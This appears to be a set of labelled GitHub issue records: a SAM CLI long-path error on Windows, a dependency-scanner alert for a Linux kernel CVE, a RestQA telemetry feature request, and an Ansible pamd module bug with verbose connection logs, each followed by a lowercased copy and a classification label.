Hello Team, I am not able to test a SpringBoot application with AWS Lambda locally using SAM CLI, because it generates classes with very long names, which the SAM CLI is not able to copy to the tmp folder when deploying as a Docker container, and I get the error below: Traceback (most recent call last): File "runpy.py", line 194, in _run_module_as_main File "runpy.py", line 87, in _run_code File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\__main__.py", line 12, in <module> cli(prog_name="sam") File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 829, in __call__ return self.main(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 782, in main rv = self.invoke(ctx) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1259, in invoke return _process_result(sub_ctx.command.invoke(sub_ctx)) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1259, in invoke return _process_result(sub_ctx.command.invoke(sub_ctx)) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1066, in invoke return ctx.invoke(self.callback, **ctx.params) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\decorators.py", line 73, in new_func return ctx.invoke(f, obj, *args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 157, in wrapped raise exception # pylint: disable=raising-bad-type File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 122, in wrapped return_value = func(*args,
**kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\utils\version_checker.py", line 41, in wrapped actual_result = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\cli\main.py", line 87, in wrapper return func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\local\invoke\cli.py", line 83, in cli do_cli( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\local\invoke\cli.py", line 175, in do_cli context.local_lambda_runner.invoke( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\local\lib\local_lambda.py", line 137, in invoke self.local_runtime.invoke( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 221, in wrapped_func return_value = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\runtime.py", line 177, in invoke container = self.create(function_config, debug_context, container_host, container_host_interface) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\runtime.py", line 71, in create code_dir = self._get_code_dir(function_config.code_abs_path) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\runtime.py", line 280, in _get_code_dir decompressed_dir: str = _unzip_file(code_path) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\runtime.py", line 496, in _unzip_file unzip(filepath, temp_dir) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\zip.py", line 99, in unzip extracted_path = _extract(file_info, output_dir, zip_ref) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\local\lambdafn\zip.py", line 61, in _extract return zip_ref.extract(file_info, output_dir) File "zipfile.py", 
line 1630, in extract File "zipfile.py", line 1701, in _extract_member FileNotFoundError: [Errno 2] No such file or directory: 'C:\\Users\\<username>\\AppData\\Local\\Temp\\tmphl495n3r\\org\\springframework\\boot\\autoconfigure\\integration\\IntegrationAutoConfiguration$IntegrationRSocketConfiguration$IntegrationRSocketClientConfiguration$RemoteRSocketServerAddressConfigured$TcpAddressConfigured.class' This issue occurs only in Windows Operating System. Is there a solution or a fix already available for this, in one of the solutions, it was advised to change the python file, but I am not good at python. Please help!! Thanks in advance.
True
main
1
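The `FileNotFoundError` in the report above is a symptom of Windows' legacy 260-character `MAX_PATH` limit: the deeply nested Spring Boot inner-class names overflow it during zip extraction into the temp directory. One commonly suggested workaround (an assumption for illustration, not the SAM CLI fix) is to hand Win32 file APIs an extended-length path via the `\\?\` prefix:

```python
def to_extended_path(path: str) -> str:
    r"""Prefix long absolute Windows paths with \\?\ so that Win32
    file APIs accept them beyond the legacy 260-character MAX_PATH
    limit. Illustrative workaround only; not SAM CLI's actual code."""
    MAX_PATH = 260
    # Short paths and already-prefixed paths are returned unchanged.
    if len(path) < MAX_PATH or path.startswith("\\\\?\\"):
        return path
    return "\\\\?\\" + path

# A hypothetical temp-extraction path exceeding the legacy limit.
deep = "C:\\Users\\me\\AppData\\Local\\Temp\\" + "x" * 300 + ".class"
safe = to_extended_path(deep)
```

An alternative on recent Windows 10+ systems is enabling the `LongPathsEnabled` registry policy so the limit stops applying system-wide.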
194,434
22,261,987,063
IssuesEvent
2022-06-10 01:56:51
panasalap/linux-4.19.72_1
https://api.github.com/repos/panasalap/linux-4.19.72_1
reopened
CVE-2020-28974 (Medium) detected in linuxlinux-4.19.224
security vulnerability
## CVE-2020-28974 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>linuxlinux-4.19.224</b></p></summary> <p> <p>Apache Software Foundation (ASF)</p> <p>Library home page: <a href=https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux>https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux</a></p> <p>Found in HEAD commit: <a href="https://github.com/panasalap/linux-4.19.72/commit/c5a08fe8179013aad614165d792bc5b436591df6">c5a08fe8179013aad614165d792bc5b436591df6</a></p> <p>Found in base branch: <b>master</b></p></p> </details> </p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Source Files (1)</summary> <p></p> <p> </p> </details> <p></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A slab-out-of-bounds read in fbcon in the Linux kernel before 5.9.7 could be used by local attackers to read privileged information or potentially crash the kernel, aka CID-3c4e0dff2095. This occurs because KD_FONT_OP_COPY in drivers/tty/vt/vt.c can be used for manipulations such as font height. 
<p>Publish Date: 2020-11-20 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-28974>CVE-2020-28974</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.0</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Physical - Attack Complexity: Low - Privileges Required: High - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: Low - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.9.7">https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.9.7</a></p> <p>Release Date: 2020-11-20</p> <p>Fix Resolution: v5.9.7</p> </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
CVE-2020-28974 (Medium) detected in linuxlinux-4.19.224 - ## CVE-2020-28974 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>linuxlinux-4.19.224</b></p></summary> <p> <p>Apache Software Foundation (ASF)</p> <p>Library home page: <a href=https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux>https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux</a></p> <p>Found in HEAD commit: <a href="https://github.com/panasalap/linux-4.19.72/commit/c5a08fe8179013aad614165d792bc5b436591df6">c5a08fe8179013aad614165d792bc5b436591df6</a></p> <p>Found in base branch: <b>master</b></p></p> </details> </p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Source Files (1)</summary> <p></p> <p> </p> </details> <p></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A slab-out-of-bounds read in fbcon in the Linux kernel before 5.9.7 could be used by local attackers to read privileged information or potentially crash the kernel, aka CID-3c4e0dff2095. This occurs because KD_FONT_OP_COPY in drivers/tty/vt/vt.c can be used for manipulations such as font height. 
<p>Publish Date: 2020-11-20 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-28974>CVE-2020-28974</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.0</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Physical - Attack Complexity: Low - Privileges Required: High - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: Low - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.9.7">https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.9.7</a></p> <p>Release Date: 2020-11-20</p> <p>Fix Resolution: v5.9.7</p> </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_main
cve medium detected in linuxlinux cve medium severity vulnerability vulnerable library linuxlinux apache software foundation asf library home page a href found in head commit a href found in base branch master vulnerable source files vulnerability details a slab out of bounds read in fbcon in the linux kernel before could be used by local attackers to read privileged information or potentially crash the kernel aka cid this occurs because kd font op copy in drivers tty vt vt c can be used for manipulations such as font height publish date url a href cvss score details base score metrics exploitability metrics attack vector physical attack complexity low privileges required high user interaction none scope unchanged impact metrics confidentiality impact low integrity impact low availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution step up your open source security game with mend
0
3,871
17,114,907,807
IssuesEvent
2021-07-11 06:05:10
restqa/restqa
https://api.github.com/repos/restqa/restqa
closed
Add Anonymous usage statistics
enhancement pair with maintainer
Hello 👋, ### 👀 Background In order to improve the developer experience, we would need to get some information about current usage. ### 🤞 What is the expected behavior? During the initialization (`restqa init`) we should ask the user whether they agree to sharing some anonymous data. ### 😎 Proposed solution. During the initialization of RestQA through the command `restqa init` we should ask the question: ``` May RestQA report anonymous usage statistics to improve the tool over time? ``` By default the answer should be `yes`. However, the user can disable the option by adding the following value to the `.restqa.yml`: ``` restqa: telemetry: false ``` > A proposed library to use could be https://www.npmjs.com/package/analytics Cheers.
True
Add Anonymous usage statistics - Hello 👋, ### 👀 Background In order to improve the developer experience, we would need to get some information about current usage. ### 🤞 What is the expected behavior? During the initialization (`restqa init`) we should ask the user whether they agree to sharing some anonymous data. ### 😎 Proposed solution. During the initialization of RestQA through the command `restqa init` we should ask the question: ``` May RestQA report anonymous usage statistics to improve the tool over time? ``` By default the answer should be `yes`. However, the user can disable the option by adding the following value to the `.restqa.yml`: ``` restqa: telemetry: false ``` > A proposed library to use could be https://www.npmjs.com/package/analytics Cheers.
main
add anonymous usage statistics hello 👋 👀 background in order to improve the developer experience we would need to get some information about current usage 🤞 what is the expected behavior during the initialization restqa init we should ask the user whether they agree to sharing some anonymous data 😎 proposed solution during the initialization of restqa through the command restqa init we should ask the question may restqa report anonymous usage statistics to improve the tool over time by default the answer should be yes however the user can disable the option by adding the following value to the restqa yml restqa telemetry false a proposed library to use could be cheers
1
2,396
8,507,765,939
IssuesEvent
2018-10-30 20:00:17
ansible/ansible
https://api.github.com/repos/ansible/ansible
closed
pamd module doesn't update common-session file
affects_2.7 bug module needs_maintainer needs_triage python3 support:community
##### SUMMARY I am trying to add a pam.d module to common-session using pamd module Task pass ok, nothing is happening. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME pamd ##### ANSIBLE VERSION ``` ansible 2.7.1 config file = None configured module search path = ['/Users/user/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules'] ansible python module location = /usr/local/Cellar/ansible/2.7.1/libexec/lib/python3.7/site-packages/ansible executable location = /usr/local/bin/ansible python version = 3.7.0 (default, Sep 18 2018, 18:47:08) [Clang 10.0.0 (clang-1000.10.43.1)] ``` ##### CONFIGURATION ``` HOST_KEY_CHECKING(env: ANSIBLE_HOST_KEY_CHECKING) = False ``` ##### OS / ENVIRONMENT Target OS: Ubuntu 18.04 LTS running on AWS ##### STEPS TO REPRODUCE Run playbook with a role that runs this task <!--- Paste example playbooks or commands between quotes below --> ```yaml --- - name: Added pam_limits module become: yes pamd: type: session name: common-session module_path: pam_limits.so control: required backup: yes ``` ##### EXPECTED RESULTS Expect seeing in `/etc/pam.d/common-session` the entry ``` session required pam_limits.so ``` ##### ACTUAL RESULTS No entry added in `/etc/pam.d/common-session` ``` TASK [oslimits : Added pam_limits module] **************************************************************************************************************************************** task path: /Users/user/github/user/ansible/roles/oslimits/tasks/session.yml:2 <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 
ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'echo ~ubuntu && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'/home/ubuntu\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'( umask 77 && mkdir -p "` echo /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715 `" && echo ansible-tmp-1540760027.205646-268627155789715="` echo /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715 `" ) && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'ansible-tmp-1540760027.205646-268627155789715=/home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data 
/etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') Using module file /usr/local/Cellar/ansible/2.7.1/libexec/lib/python3.7/site-packages/ansible/modules/system/pamd.py <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> PUT /Users/user/.ansible/tmp/ansible-local-432871i84_61/tmplsws36wp TO /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC sftp -b - -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 '[ec2-54-00-00-00.eu-central-1.compute.amazonaws.com]' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'sftp> put /Users/user/.ansible/tmp/ansible-local-432871i84_61/tmplsws36wp /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: 
mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug2: Remote version: 3\r\ndebug2: Server supports extension "posix-rename@openssh.com" revision 1\r\ndebug2: Server supports extension "statvfs@openssh.com" revision 2\r\ndebug2: Server supports extension "fstatvfs@openssh.com" revision 2\r\ndebug2: Server supports extension "hardlink@openssh.com" revision 1\r\ndebug2: Server supports extension "fsync@openssh.com" revision 1\r\ndebug3: Sent message fd 3 T:16 I:1\r\ndebug3: SSH_FXP_REALPATH . -> /home/ubuntu size 0\r\ndebug3: Looking up /Users/user/.ansible/tmp/ansible-local-432871i84_61/tmplsws36wp\r\ndebug3: Sent message fd 3 T:17 I:2\r\ndebug3: Received stat reply T:101 I:2\r\ndebug1: Couldn\'t stat remote file: No such file or directory\r\ndebug3: Sent message SSH2_FXP_OPEN I:3 P:/home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py\r\ndebug3: Sent message SSH2_FXP_WRITE I:4 O:0 S:32768\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: In write loop, ack for 4 32768 bytes at 0\r\ndebug3: Sent message SSH2_FXP_WRITE I:5 O:32768 S:32768\r\ndebug3: Sent message SSH2_FXP_WRITE I:6 O:65536 S:11453\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: In write loop, ack for 5 32768 bytes at 32768\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: In write loop, ack for 6 11453 bytes at 65536\r\ndebug3: Sent message SSH2_FXP_CLOSE I:4\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s 
-o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'chmod u+x /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/ /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 -tt ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'sudo -H -S -n -u root /bin/sh -c '"'"'"'"'"'"'"'"'echo 
BECOME-SUCCESS-hgdzwkselssyvarkpelisbqztplobhng; /usr/bin/python3 /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py'"'"'"'"'"'"'"'"' && sleep 0'"'"'' Escalation succeeded <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'\r\n{"changed": false, "ansible_facts": {"pamd": {"changed": false, "change_count": 0, "action": "updated", "backupdest": ""}}, "invocation": {"module_args": {"type": "session", "name": "common-session", "module_path": "pam_limits.so", "control": "required", "backup": true, "state": "updated", "path": "/etc/pam.d", "new_type": null, "new_control": null, "new_module_path": null, "module_arguments": null}}}\r\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\nShared connection to ec2-54-00-00-00.eu-central-1.compute.amazonaws.com closed.\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="/Users/user/.ssh/minerva-prime/minerva-frankfurt-default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o 
ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'rm -f -r /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/ > /dev/null 2>&1 && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') ok: [test1] => { "ansible_facts": { "pamd": { "action": "updated", "backupdest": "", "change_count": 0, "changed": false } }, "changed": false, "invocation": { "module_args": { "backup": true, "control": "required", "module_arguments": null, "module_path": "pam_limits.so", "name": "common-session", "new_control": null, "new_module_path": null, "new_type": null, "path": "/etc/pam.d", "state": "updated", "type": "session" } } } META: ran handlers META: ran handlers ```
True
pamd module doesn't update common-session file - ##### SUMMARY I am trying to add a pam.d module to common-session using pamd module Task pass ok, nothing is happening. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME pamd ##### ANSIBLE VERSION ``` ansible 2.7.1 config file = None configured module search path = ['/Users/user/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules'] ansible python module location = /usr/local/Cellar/ansible/2.7.1/libexec/lib/python3.7/site-packages/ansible executable location = /usr/local/bin/ansible python version = 3.7.0 (default, Sep 18 2018, 18:47:08) [Clang 10.0.0 (clang-1000.10.43.1)] ``` ##### CONFIGURATION ``` HOST_KEY_CHECKING(env: ANSIBLE_HOST_KEY_CHECKING) = False ``` ##### OS / ENVIRONMENT Target OS: Ubuntu 18.04 LTS running on AWS ##### STEPS TO REPRODUCE Run playbook with a role that runs this task <!--- Paste example playbooks or commands between quotes below --> ```yaml --- - name: Added pam_limits module become: yes pamd: type: session name: common-session module_path: pam_limits.so control: required backup: yes ``` ##### EXPECTED RESULTS Expect seeing in `/etc/pam.d/common-session` the entry ``` session required pam_limits.so ``` ##### ACTUAL RESULTS No entry added in `/etc/pam.d/common-session` ``` TASK [oslimits : Added pam_limits module] **************************************************************************************************************************************** task path: /Users/user/github/user/ansible/roles/oslimits/tasks/session.yml:2 <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o 
ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'echo ~ubuntu && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'/home/ubuntu\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o 